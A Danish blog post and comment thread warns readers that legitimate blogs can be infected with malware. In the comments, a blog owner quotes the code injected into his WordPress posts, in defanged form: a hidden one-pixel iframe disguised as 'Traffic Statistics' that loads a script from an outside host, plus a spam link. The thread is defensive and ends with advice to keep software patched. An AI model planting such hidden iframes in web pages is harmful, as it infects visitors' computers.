Er du beskyttet mod virus blogs?
Som ivrig blogger og bloglæser, så kommer man vidt omkring på det store Internet. Hvis man har lidt erfaring så ved man hurtigt hvilke steder man kan besøge uden af være bekymret og hvilke sider man ikke bør besøge. Du har måske været fordi Warez sider eller Serial No. sider (naturligvis kun fordi man var nysgerrig efter hvad det mon var for noget). Men spørgsmålet er om din maskine var godt nok beskyttet da du gjorde det?
Du har muligvis set et billede som det nedenstående, hvor din antivirus eller anden form for beskyttelsesværktøj har blokeret for små programmer eller kodestumper som kan være ødelæggende for din computer. Men hvis du ikke har, kan du så føle dig sikker?
Personligt bliver jeg mere bekymret når jeg ser sådan en advarsel, for hvad så med alle de gange hvor jeg ikke ser noget? Er det så fordi der ikke er noget at være bange for eller er min beskyttelse bare ikke god nok?
Pas på selv troværdige sider
Nu tror du måske, at det kun er ulødige sider der giver problemer, men ovenstående billede kom faktisk frem da jeg her til morgen besøgte en af denne blogs læseres blog. Lidt skræmmende ikke? Jeg er sikker på, at personen ikke selv ved at hans blog er inficeret og at den inficerer hans besøgende når de kommer forbi siden. Jeg har dog nu sendt ham en mail så han forhåbentlig kan få det rettet!
Jeg vil ikke hænge personen ud her, da han skal have lov til at få rettet fejlen. Dog vil jeg advare mod at besøge blogs der slutter på .org som du finder et link til på denne blog.
Mere almindeligt at støde på vira
Desværre er dette ikke et enestående tilfælde, men noget jeg har oplevet i hvert fald en håndfuld gange. Så blot for at understrege min pointe: Beskyt dig 
loading...
Ja vi har jo haft nogle skræmmende eksempler her for nylig, hvor både EB og TV2 var “inficeret”…
Jeg tror vi vil se langt mere af den slags i fremtiden. Ganske ligesom vi så et skift væk fra traditionelle, bootsector vira til e-mail vira.
Og hvad der er endnu mere skræmmende: Hvis det lykkedes nogen at proppe et inficeret banner ind i et af de store netværk vil vi se en eksplosiv spredning i løbet af 0.5 af proportioner hvis lige vi ikke har set før.
Skræmmende tanke. Vi må hellere lukke ned for det internet. Det er tydeligvis også en overvurderet teknologi, som burde have været blevet i skuffen.
Det er min blog som åbenbart er inficeret. Jeg er i fuld gang med at finde kilden.
Meget mærkeligt at det kan ske for jeg har været meget forsigtig med brug af plugins osv.
Tak for meldingen, Mikael!
No problem Anders. Det kan jo være svært at opdage hvis ikke man har noget beskyttelse der siger til og hvis der ikke er andre der kommenterer det.
Brian, synes det ikke det er lidt drastisk at lukke hele internettet? Måske vi kunne nøjes med de russiske og østeuropæiske IP’er?
Jeg vil tro, at jeg nu har fjernet linket til virus. Det som jeg fandt i koden var injection midt i 2 forskellige afsnit.
Det injectede så sådan ud (http://www har jeg udskiftet med zzzz://xxx og er erstattet med () for at undgå aktive links osv hér)
(noscript)Galera visitem este site de (a href=”zzzz://xxx.grandestoques.com”)toques mp3 para celular(/a)
og
(!– Traffic Statistics –) (iframe src=zzzz://xxx.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0)(/iframe) (!– End Traffic Statistics –)
Som sagt var det sprøjtet direkte ind mellem linierne i 2 forskellige afsnit.
Det gode spørgsmål er nu hvordan jeg så at sige lukker hullet.
Er det klogeste at installere alt fra bunden igen eller er hullet mere sansynligt i googles søgefunktion på bloggen?
Hvis I aner hvordan I ville angribe det, så sig meget gerne til.
Nå, lidt af koden smuttede alligevel. Mindre end/Større end-tegnene er skiftet ud med () skulle der stå.
Jeg tror, uden at have kigget koden igennnem, at det drejer sig om udnyttelse af en sårbarhed. Det er desværre også der der hyppigst sker sådanne ting, om det er online eller software/operativsystem osv spiller ikke så stor en rolle, men det handler i høj grad om at være patchet og opdateret. Det er langt svære på en blog, for man sidder ikke ved maskinen 24/7 og hvis man selv hoster sin side, så er det endnu sværer (ikke at det ikke kan lade sig gøre) ..
Så derfor, et godt råd.. Hold dig opdatert og sørg for ikke at vente, når der er nye opdateringer….
Hej Jens, gamle ven!
Tak fordi du gad se på sagen med dine erfarne sikkerhedsbriller. Jeg har for et stykke tid siden opdateret wp version og det var åbenbart på tide.
Jeg tror jeg lader tingene stå til for nu og ser om der kommer noget virus tilbage – det burde der ikke med en opdateret wp osv.
Der ser i hvert fald ud til at det virker nu. Jeg for ikke længere nogen advarsel når jeg kigger forbi.